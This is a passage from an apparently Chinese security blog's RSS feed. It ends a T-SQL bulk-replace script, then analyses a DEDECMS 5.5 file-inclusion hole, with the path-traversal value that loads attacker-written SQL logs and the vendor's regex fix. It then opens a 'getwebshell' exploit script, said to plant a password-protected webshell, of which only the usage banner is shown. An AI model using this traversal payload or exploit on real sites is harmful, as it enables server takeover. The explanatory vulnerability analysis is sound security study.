print &lt;span style=&quot;color: #ff0000;&quot;&gt;'表：'&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@tableName&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;',列:'&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;@columnName&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'被更新'&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;convert&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;varchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;10&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@iRow&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'条记录;'&lt;/span&gt;
      end     
      fetch next &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FROM&lt;/span&gt; cur1 &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;INTO&lt;/span&gt; @columnName
&amp;nbsp;
&amp;nbsp;
&amp;nbsp;
end
close cur1
deallocate cur1
&amp;nbsp;
&amp;nbsp;
fetch next &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;FROM&lt;/span&gt; cur &lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;INTO&lt;/span&gt; @tableName&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@tbID
end
print &lt;span style=&quot;color: #ff0000;&quot;&gt;'数据库共有'&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;convert&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;varchar&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;10&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;,&lt;/span&gt;@iResult&lt;span style=&quot;color: #66cc66;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #66cc66;&quot;&gt;+&lt;/span&gt;&lt;span style=&quot;color: #ff0000;&quot;&gt;'条记录被更新!!!'&lt;/span&gt;
&amp;nbsp;
&amp;nbsp;
close cur
deallocate cur
&lt;span style=&quot;color: #993333; font-weight: bold;&quot;&gt;SET&lt;/span&gt; nocount off&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/mssql-bcp-usage/&quot; title=&quot;MSSQL bcp用法&quot;&gt;MSSQL bcp用法&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/remote-backup-using-mysql-database-mysqldump/&quot; title=&quot;用mysqldump远程备份mysql数据库&quot;&gt;用mysqldump远程备份mysql数据库&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/editplus-regular-expression-string-replacement-detailed/&quot; title=&quot;EditPlus正则表达式替换字符串详解&quot;&gt;EditPlus正则表达式替换字符串详解&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/to-mssql-command-of-sa-privileges-methods/&quot; title=&quot;[转]mssql的sa权限执行命令方法总结&quot;&gt;[转]mssql的sa权限执行命令方法总结&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/mssql-pass-into-the-killing-as-long-as-there-is-into-the-points-system-privileges/&quot; title=&quot;MSSQL注入通杀，只要有注入点就有系统权限&quot;&gt;MSSQL注入通杀，只要有注入点就有系统权限&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/mssql-injection-of-union-access-to-data-in-a-number-of-studies/&quot; title=&quot;对mssql注射中union获取数据的一些研究&quot;&gt;对mssql注射中union获取数据的一些研究&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/the-use-of-injection-site-to-determine-whether-the-separation-of-web-database-2/&quot; title=&quot;利用注射点判断数据库web是否分离&quot;&gt;利用注射点判断数据库web是否分离&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/access-database-using-asp-compression/&quot; title=&quot;用ASP压缩ACCESS数据库&quot;&gt;用ASP压缩ACCESS数据库&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/asp-listed-in-the-database-of-all-table/&quot; title=&quot;ASP列出数据库中的所有表&quot;&gt;ASP列出数据库中的所有表&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186606/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/mssql-bulk-replacement-of-the-entire-database/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186606/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186606/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/mssql-bulk-replacement-of-the-entire-database/feed/</wfw:commentRss><slash:comments>0</slash:comments><description>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
declare @Str1 varchar&amp;#40;8000&amp;#41;
SET @Str1='参数1'
declare @Str2 varchar&amp;#40;8000&amp;#41;
SET @Str2='参数2'
&amp;#160;
&amp;#160;
SET nocount ON
&amp;#160;
&amp;#160;
declare @tableName nvarchar&amp;#40;100&amp;#41;,@columnName nvarchar&amp;#40;100&amp;#41;,@tbID int,@iRow int,@iResult int
declare @sql nvarchar&amp;#40;500&amp;#41;
&amp;#160;
&amp;#160;
SET @iResult=0
declare cur cursor FOR
SELECT name,id FROM sysobjects WHERE xtype='U'
&amp;#160;
&amp;#160;
open cur
fetch next FROM cur INTO @tableName,@tbID
&amp;#160;
&amp;#160;
while @@fetch_status=0
begin
declare cur1 cursor FOR
        --xtype in (231,167,239,175,99) 为char,varchar,nchar,nvarchar,ntext类型
        SELECT [...]&lt;img src=&quot;http://www1.feedsky.com/t1/405186606/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/mssql-bulk-replacement-of-the-entire-database/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186606/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186606/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>mssql</category><category>SQL</category><category>替换</category><category>数据库</category><pubDate>Sun, 16 May 2010 17:03:15 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/mssql-bulk-replacement-of-the-entire-database/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1372</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/mssql-bulk-replacement-of-the-entire-database/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186606/5236324</fs:itemid></item><item><title>分析DEDECMS 5.5 datalistcp.class.php 包含</title><link>http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/</link><content:encoded>&lt;p&gt;作者:st0p&lt;br /&gt;
转载请注明出处 http://www.st0p.org&lt;/p&gt;
&lt;p&gt;老早就看到有人发的洞，一直想过写分析来着，最近一直呆在UBUNTU下安装东西。。老忘。。。&lt;br /&gt;
有时有些朋友加我，教他找洞。。。这个好似是个累活，而且运气占很大一部分。。。所以我还是尽量帮分析过程发出来吧，也方便我自己学习。&lt;br /&gt;
具体的EXP，请看：&lt;a href=&quot;http://www.st0p.org/blog/archives/dedecms-5-5-datalistcp-class-php-contains-exp.html&quot;&gt;http://www.st0p.org/blog/archives/dedecms-5-5-datalistcp-class-php-contains-exp.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;以前呢，DEDECMS会把出错的SQL信息，写进mysql_error_trace.php，后来被大牛们爆出来了。就改名为mysql_error_trace.inc了。。。&lt;br /&gt;
没想到这次又被包含了。。。看来记录SQL信息也不是啥好事。。。&lt;/p&gt;
&lt;p&gt;这个EXP的原理呢，是通过构造特殊的请求给plus/digg_ajax.php来达到写入我们的语句到mysql_error_trace.inc，当然可以满足我们这一步写入到mysql_error_trace.inc的文件还有不少。。不过想要执行他就不可能了。。然后这次报出的洞呢就是运气很好才能碰到的。。&lt;br /&gt;
关键代码存在于&lt;/p&gt;
&lt;p&gt;/include/datalistcp.class.php&lt;/p&gt;

&lt;div class=&quot;wp_syntax&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre class=&quot;php&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #339933;&quot;&gt;...&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;isset&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$needCode&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; ? &lt;span style=&quot;color: #000088;&quot;&gt;$needCode&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;:&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$cfg_soft_lang&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//通过isset函数检查$needCode是否已配置，如已配置则结果为$needCode，否则结果为$cfg_soft_lang&lt;/span&gt;
&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//当我们伪造结果为aa/../../../data/mysql_error_trace时&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;file_exists&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;DEDEINC&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'/code/datalist.'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'.inc'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&amp;nbsp;
	&lt;span style=&quot;color: #b1b100;&quot;&gt;require_once&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;DEDEINC&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'/code/datalist.'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'.inc'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
 &lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//后缀是.inc&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//检查文件是否存在，存在则包含。我们通过../成功跳转到到data目录，包含我们刚才构造过的mysql_error_trace.inc&lt;/span&gt;
&lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//成功运行我们mysql_error_trace.inc在构造的语句。。。&lt;/span&gt;
&lt;span style=&quot;color: #339933;&quot;&gt;...&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;郁闷，前几次想写分析的时候官方还没补呢。。刚去官方看了下通过正则进行了修补&lt;/p&gt;

&lt;div class=&quot;wp_syntax&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
7
8
9
10
11
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre class=&quot;php&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;isset&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$needCode&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; ? &lt;span style=&quot;color: #000088;&quot;&gt;$needCode&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;:&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$cfg_soft_lang&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #990000;&quot;&gt;preg_replace&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;/[\w-]/&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
 &lt;span style=&quot;color: #666666; font-style: italic;&quot;&gt;//通过正则过滤了。。。&lt;/span&gt;
&lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;file_exists&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;DEDEINC&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'/code/datalist.'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'.inc'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&amp;nbsp;
	&lt;span style=&quot;color: #b1b100;&quot;&gt;require_once&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;DEDEINC&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'/code/datalist.'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$codefile&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'.inc'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;

&lt;h3  class=&quot;related_post_title&quot;&gt;您可能对以下文章有兴趣↓&lt;/h3&gt;&lt;ul class=&quot;related_post&quot;&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/&quot; title=&quot;DEDECMS 5.5 datalistcp.class.php 包含 EXP&quot;&gt;DEDECMS 5.5 datalistcp.class.php 包含 EXP&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-fiction-serial-module-0day/&quot; title=&quot;DEDECMS 小说连载模块 0DAY&quot;&gt;DEDECMS 小说连载模块 0DAY&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-v5-5-final-select_soft_post-php-vulnerability/&quot; title=&quot;DEDECMS v5.5 Final select_soft_post.php 漏洞&quot;&gt;DEDECMS v5.5 Final select_soft_post.php 漏洞&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-xday/&quot; title=&quot;DEDECMS XDAY&quot;&gt;DEDECMS XDAY&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;http://www.lixiaopeng.org/dedecms-53-inadequacies-chicken-plus-one-small-leak/&quot; title=&quot;dedecms 5.3的不足之处,加一鸡肋小漏!&quot;&gt;dedecms 5.3的不足之处,加一鸡肋小漏!&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;img src=&quot;http://www1.feedsky.com/t1/405186607/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186607/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186607/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</content:encoded><wfw:commentRss>http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/feed/</wfw:commentRss><slash:comments>291</slash:comments><description>作者:st0p
转载请注明出处 http://www.st0p.org
老早就看到有人发的洞，一直想过写分析来着，最近一直呆在UBUNTU下安装东西。。老忘。。。
有时有些朋友加我，教他找洞。。。这个好似是个累活，而且运气占很大一部分。。。所以我还是尽量帮分析过程发出来吧，也方便我自己学习。
具体的EXP，请看：http://www.st0p.org/blog/archives/dedecms-5-5-datalistcp-class-php-contains-exp.html
以前呢，DEDECMS会把出错的SQL信息，写进mysql_error_trace.php，后来被大牛们爆出来了。就改名为mysql_error_trace.inc了。。。
没想到这次又被包含了。。。看来记录SQL信息也不是啥好事。。。
这个EXP的原理呢，是通过构造特殊的请求给plus/digg_ajax.php来达到写入我们的语句到mysql_error_trace.inc，当然可以满足我们这一步写入到mysql_error_trace.inc的文件还有不少。。不过想要执行他就不可能了。。然后这次报出的洞呢就是运气很好才能碰到的。。
关键代码存在于
/include/datalistcp.class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
...
$codefile = &amp;#40;isset&amp;#40;$needCode&amp;#41; ? $needCode : $cfg_soft_lang&amp;#41;;
&amp;#160;
//通过isset函数检查$needCode是否已配置，如已配置则结果为$needCode，否则结果为$cfg_soft_lang
//当我们伪造结果为aa/../../../data/mysql_error_trace时
&amp;#160;
if&amp;#40;file_exists&amp;#40;DEDEINC.'/code/datalist.'.$codefile.'.inc'&amp;#41;&amp;#41;
&amp;#160;
&amp;#123;
&amp;#160;
	require_once&amp;#40;DEDEINC.'/code/datalist.'.$codefile.'.inc'&amp;#41;;
 //后缀是.inc
&amp;#125;
//检查文件是否存在，存在则包含。我们通过../成功跳转到到data目录，包含我们刚才构造过的mysql_error_trace.inc
//成功运行我们mysql_error_trace.inc在构造的语句。。。
...

郁闷，前几次想写分析的时候官方还没补呢。。刚去官方看了下通过正则进行了修补

1
2
3
4
5
6
7
8
9
10
11
$codefile = &amp;#40;isset&amp;#40;$needCode&amp;#41; ? $needCode : $cfg_soft_lang&amp;#41;;
&amp;#160;
$codefile = preg_replace&amp;#40;&amp;#34;/[\w-]/&amp;#34;, '', $codefile&amp;#41;;
 //通过正则过滤了。。。
if&amp;#40;file_exists&amp;#40;DEDEINC.'/code/datalist.'.$codefile.'.inc'&amp;#41;&amp;#41;
&amp;#160;
&amp;#123;
&amp;#160;
	require_once&amp;#40;DEDEINC.'/code/datalist.'.$codefile.'.inc'&amp;#41;;
&amp;#160;
&amp;#125;

您可能对以下文章有兴趣↓DEDECMS 5.5 datalistcp.class.php 包含 EXPDEDECMS 小说连载模块 0DAYDEDECMS v5.5 Final select_soft_post.php 漏洞DEDECMS XDAYdedecms 5.3的不足之处,加一鸡肋小漏!&lt;img src=&quot;http://www1.feedsky.com/t1/405186607/Lixiaopeng/feedsky/s.gif?r=http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/&quot; border=&quot;0&quot; height=&quot;0&quot; width=&quot;0&quot; style=&quot;position:absolute&quot; /&gt;&lt;p class=&quot;fswww1&quot;&gt;&lt;a href=&quot;http://www1.feedsky.com/r/l/feedsky/Lixiaopeng/405186607/art01.html&quot; target=&quot;_blank&quot;&gt;&lt;img border=&quot;0&quot; ismap=&quot;ismap&quot; src=&quot;http://www1.feedsky.com/r/i/feedsky/Lixiaopeng/405186607/art01.gif&quot; onerror=&quot;this.style.display='none'&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description><category>DEDECMS 5.5</category><category>dedecms</category><category>入侵</category><category>mysql_error_trace.inc</category><category>datalistcp.class.php</category><category>包含</category><pubDate>Sat, 03 Apr 2010 23:38:00 +0800</pubDate><author>admin</author><comments>http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/#comments</comments><guid isPermaLink="false">http://www.lixiaopeng.org/?p=1370</guid><dc:creator>admin</dc:creator><fs:srclink>http://www.lixiaopeng.org/analysis-dedecms-5-5-datalistcp-class-php-contains/</fs:srclink><fs:srcfeed>http://www.lixiaopeng.org/feed/</fs:srcfeed><fs:itemid>feedsky/Lixiaopeng/~7333428/405186607/5236324</fs:itemid></item><item><title>DEDECMS 5.5 datalistcp.class.php 包含 EXP</title><link>http://www.lixiaopeng.org/dedecms-5-5-datalistcp-class-php-contains-exp/</link><content:encoded>&lt;p&gt;来源于互联网，具体作者不详。看到好久了，一直是想写分析在发出来。老望。。。最近RSS订阅中好多这个，先发一下记录。有空分析，官方已修补。。&lt;/p&gt;
&lt;p&gt;执行成功会在data/cache下生成t.php一句话小马&lt;br /&gt;
密码x&lt;/p&gt;

&lt;div class=&quot;wp_syntax&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;line_numbers&quot;&gt;&lt;pre&gt;1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre class=&quot;php&quot; style=&quot;font-family:monospace;&quot;&gt;&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;&amp;lt;?php&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;print_r&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$argc&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;&amp;lt;&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;3&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;print_r&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'
+----------------------------------------+
Usage: php '&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$argv&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$argv&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;' localhost /dedecms/
+----------------------------------------+   
'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;exit&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
